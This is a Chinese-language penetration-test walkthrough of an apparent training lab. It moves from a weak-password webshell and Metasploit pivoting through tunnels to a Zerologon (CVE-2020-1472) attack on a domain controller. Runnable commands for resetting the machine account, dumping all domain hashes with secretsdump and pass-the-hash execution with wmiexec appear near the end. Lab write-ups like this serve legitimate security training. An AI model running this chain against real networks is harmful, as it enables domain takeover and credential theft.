使用fscan扫描192.168.10.10,发现3590端口开放web服务
存在弱口令admin/tao
新建文件并编辑,写入木马,并用蚁剑连接
上线msf
使用ipconfig /all发现是双网卡
配置路由
# 在 MSF 会话中运行 autoroute 后渗透模块,自动根据已获取的会话路由添加通往内网(192.168.20.0/24)的路由,使 MSF 能够访问内网主机 run post/multi/manage/autoroute上传stowaway打开通道
靶机
攻击机
使用proxifier搭建代理服务器
就搭建好通道并访问192.168.20.20:8055了
我们不知道连接密码,使用awBrouter.py爆破
配置代理并用蚁剑连接
连接成功,上线msf并使用(注意,通道不能关,我是再开一个会话,这一步好像不用,可以在192.168.10.10完成)
使用net time /domain获取域信息
# 利用 Zerologon(CVE-2020-1472)漏洞攻击域控 WIN-7NRTJO59O7N(192.168.20.30),将其机器账户密码置空 python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30 使用置空后的机器账户哈希从域控导出域内所有用户哈希(-no-pass 表示无需再输入密码) python secretsdump.py "cyberstrikelab.com/WIN-7NRTJO59O7N$@192.168.20.30" -no-pass 使用导出的 administrator 哈希(f349...e2bc)通过 WMI 在域控上执行命令,实现远程控制 python wmiexec.py -hashes :f349636281150c001081894de72b4e2bcyberstrikelab.com/administrator@192.168.20.30GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura · GitHub